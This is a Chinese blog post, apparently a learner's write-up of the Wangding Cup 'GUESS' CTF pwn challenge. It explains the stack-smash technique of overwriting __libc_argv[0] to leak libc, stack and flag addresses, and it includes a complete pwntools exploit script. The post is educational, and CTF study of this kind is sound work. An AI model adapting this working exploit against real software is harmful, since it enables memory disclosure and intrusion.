网鼎杯GUESS-萌新分析

最新推荐文章于 2022-07-20 20:55:21 发布
最新推荐文章于 2022-07-20 20:55:21 发布
阅读量491 收藏 1
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30204577/article/details/105983589
版权

0x00 前言

学一下往年的网鼎杯,,,,,好让自己心里有点数

确实,我好菜。

0x10 信息收集

通过ida打开。可以发现有flag.txt字样,,又发现让猜,,,嗯,,是stack smash,别的大佬说的,,我今天才学这个知识点。

0x 20 分析

0x 21 关键源码分析

分析stack smash的源码,可以看到,如果我们破坏了canary,然后系统就会调用这个函数进行一些输出,即stack smashing detected然后继续输出__libc_argv[0]指向的内容,所以我们便需要把我们想要输出的内容给想办法给搞到这个地方。

void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
                    msg, __libc_argv[0] ?: "<unknown>");
}

0x 22大致步骤

这个题需要三个步骤:

  1. 泄露一个函数的真实地址,然后据此来找到libc
  2. 根据libc来泄露出environ,即栈的地址
  3. 根据environ来泄漏flag的地址

0x 30 详细步骤

0x31 确定真实地址

我们首先需要先找到argv[0]的地址,然后我们才方便将我们想要打印的东西给设定到那个地方。

在这里 我们可以采用两种方法:

  • 在main处下断点,然后停下的地方指向文件名的就是地址
  • 直接p & __libc_argv[0]

查看gets输入的字符串的位置,

可以看到是rsp-0x40的地方。

我们在gets处下断点,然后查看当时的rsp的地址

将指向argv[0]处的地址与改地址相减得到这个padding的大小,接下来就是将puts 的got表发送到这个地方然后通过stack smash进行真正的地址的打印。

在这里有一点需要指出的是:原本我们是可以打印argv[0]指向的内容,即文件名,现在我们改成了puts 的got'表就会将puts 的真实地址进行打印,然后我们便可以通过这个真实地址来找到对应的libc版本。

0x32 泄露栈的地址

这个很简单,只需要使用 如下所示的方式就可以知道栈的地址。

0x 33 找到flag与栈的偏移

找到flag在栈上的地址。

我们可以现在本地建一个flag的txt文档,然后再gdb中使用n命令,知道下面出现flag字样,然后将其与environ做减法就可以得到它在栈上的偏移。

0x40 exp如下

from pwn import *
context.log_level = 'debug'

puts_got = 0x602020
p = process('./GUESS')

#leak libc
p.recvuntil('guessing flag\n')
payload = 'a'*0x128 + p64(puts_got)
p.sendline(payload)
p.recvuntil('detected ***: ')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
log.success('puts addr : 0x%x' %puts_addr)
#gdb.attach(p)
offset_puts = 0x000000000006f690
libc_base = puts_addr - offset_puts
log.success('libc base addr : 0x%x' %libc_base)

offset__environ = 0x00000000003c6f38
_environ_addr = libc_base + offset__environ
log.success('_environ addr : 0x%x' %_environ_addr)

#leak stack
p.recvuntil('guessing flag\n')
payload = 'a'*0x128 + p64(_environ_addr)
p.sendline(payload)
p.recvuntil('detected ***: ')
stack_base = u64(p.recv(6).ljust(8,'\x00')) - 0x198
log.success('stack base addr : 0x%x' %stack_base)
flag_addr = stack_base + 0x30

#leak flag
p.recvuntil('guessing flag\n')
payload = 'a'*0x128 + p64(flag_addr)
p.sendline(payload)
p.recvuntil('detected ***: ')
flag = p.recvuntil('}')
print flag

p.interactive()

exp来源于github....用来学习了。。我已经尽量写得能够让各位看懂了,,我能够理解了。。前面有的步骤是参考的https://blog.csdn.net/qq_38783875/article/details/82594526?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1 他的本地环境和我的不一样,,,搞得我图片也不好做。。。可以对比着学习。

TedLau.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
guess-the-number:Discord的数字游戏机器人
03-09
【标题解析】:“guess-the-number: Discord的数字游戏机器人”是指一个基于Discord...开发者可能通过分析"guess-the-number-main"中的代码学习到如何创建类似的Discord bot,以及如何设计和实现一个简单的游戏逻辑。
2022年杯题目整理
Laffrey的专栏
09-12 2183
2022年杯题目整理
杯pwn之GUESS
Peanuts
08-30 1923
做了杯才发现自己有多菜。。。 拿到题目先ida一波 基本分析 看到了发现了是一个本地加载flag.txt所以有可能可以用stack samsh:详细可以看ctf wiki上的花式栈溢出技巧然后拖入gdb 进行一波checksec             可以发现有了nx栈不可执行这个还好,但是看到了cannary就有点头疼了。。还好有stack smash这个方法可以...
杯2018 guess(stack smashing)
seaaseesa的博客
04-30 921
wdb2018_guess stack smashing 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Flag读取并存储在栈里 Fork三次子进程,然后有gets函数,导致栈溢出,但是有canary保护。 由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为...
杯GUESS
doudoudedi
10-18 251
3次覆盖__libc_argv[0]然后泄露出put的真实地址然偶clac出libc然后泄露出environ里面存的栈地址然后计算flag在栈上的偏移再次泄露即可 exp: from pwn import * from LibcSearcher import * p=process('./GUESS') elf=ELF('./GUESS') libc=ELF('/lib/x86_64-linux-...
PWN 杯 GUESS
SsMing的博客
09-11 1679
拖了好久才看题,中间去参加比赛去了,休息够了开始学习啦! GUESS 在checksec查看后,发现开了canary 和 NX保护,所以可以用 stack smash 来做这个题 ida打开,查看一下源代码: 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的...
GUESS-开源
05-30
作为一个开源项目,GUESS 拥有一个活跃的社区,成员们共享资源、讨论问题、提出改进意见并共同开发功能。开源社区的存在确保了项目的持续发展和更,同时为用户提供技术支持和学习资源。 **4. 文件名称列表中的 ...
guess-a-number:XCode C++ 教程项目
06-17
在本教程项目“guess-a-number”中,我们将深入学习如何使用Xcode进行C++开发,这对于初学者来说是一个很好的起点。Xcode是Apple为iOS、macOS以及其他Apple平台开发的应用程序集成开发环境(IDE),而C++则是一种...
guess-inttypes-开源
05-15
标题 "guess-inttypes-开源" 指向的是一个开源项目,该项目的目的是通过脚本自动化地确定在C编程语言中适用于不同平台的16、32和64位整数类型。在C语言中,不同的系统可能有不同的整数类型大小,这可能导致移植性...
asanas-guess-game-api
03-27
【标题】"asanas-guess-game-api"是一个项目,它提供了瑜伽姿势猜谜游戏的API接口。这个项目可能是一个Web应用程序或移动应用后端服务,允许用户参与猜测不同瑜伽姿势的游戏。 【描述】"asanas-guess-game-api"并未...
2020杯朱雀组题目.rar
05-20
含有misc,re,crypto,pwn,web。web题为thinkjava
杯2020.txt
05-24
杯2020白虎组部分题目链接:https://pan.baidu.com/s/1_8iThteUQKj2jBg95nkzEQ 提取码:inrl
杯密码题
05-01
杯密码题chaoyang.txt,加密方式暂不说,想知道解题流程可以讨论
2020杯朱雀组部分(13/15道题)wp
Y-Y-K的博客
05-18 1万+
2020杯朱雀组部分(13/15道题)wpMisc0x01 签到0x02 key0x03 九宫格0x04 小明的bb86Web0x01 nmap0x02 phpweb反序列化绕黑名单Reverse0x01 go0x02 treeCrypto0x01 simple0x02 RUA0x03 Guess_gamePwn0x01 魔法房间0x02 云盾 首先,感谢zsky,HotSpurzzZ和b0b0se3三位师傅的共同努力,才有了以下的题解,三位师傅的个人博客可在我博客的友链里看到 Misc 0x01 签到
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 410
stack smash
2018(PWN)杯第一场解题记录(Writeup)
热门推荐
SWEET0SWAT的博客
08-21 1万+
MISC   clip     使用十六进制查看软件打开,查找的过程中发现有idat头:       还有一处在下方,表示还有另一张图片      但是这里缺少头部需要手动补充上去再另存文件:      一共提取出两张图片,但是图片明显被处理过了         其实不明白出题人为什么要弄成这样,CTF比赛还要弄成这样纯粹就是刁难,弄得眼睛贼疼。   minified...
2020-杯部分writup-3
zhang14916的博客
05-20 1777
1.simple 根据下载题目提示,这可能是一个仿射编码,根据仿射密码求解 import gmpy2 miwen="kgws{m8u8cm65-ue9k-44k5-8361-we225m76eeww}" minwen="" k=8 b=22 for i in miwen: if ord(i)>=ord('a') and ord(i)<=ord('z'): miwenint=ord(i)-ord('a') for j in xrange(26):
杯-教育
九层台
09-02 1498
beijing 这里可以发现有flag的影子,但是异或之后就没有影子了,获取flag其实就是把异或的部分去掉。 这里就是算法了。 别人写的比较好,用别人的吧。 #include using namespace std; unsigned int byte_804A020[28] = { 0x61, 0x4C, 0x67, 0x59, 0x69, 0x29, 0x6E, ...
guess-xsctf
最新发布
07-28
根据提供的引用内容,我无法确定问题"guess-xsctf"的具体含义。请提供更多的信息或者明确你的问题,我将尽力回答。 #### 引用[.reference_title] - *1* [xctf攻防世界 REVERSE 高手进阶区 Guess-the-Number]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值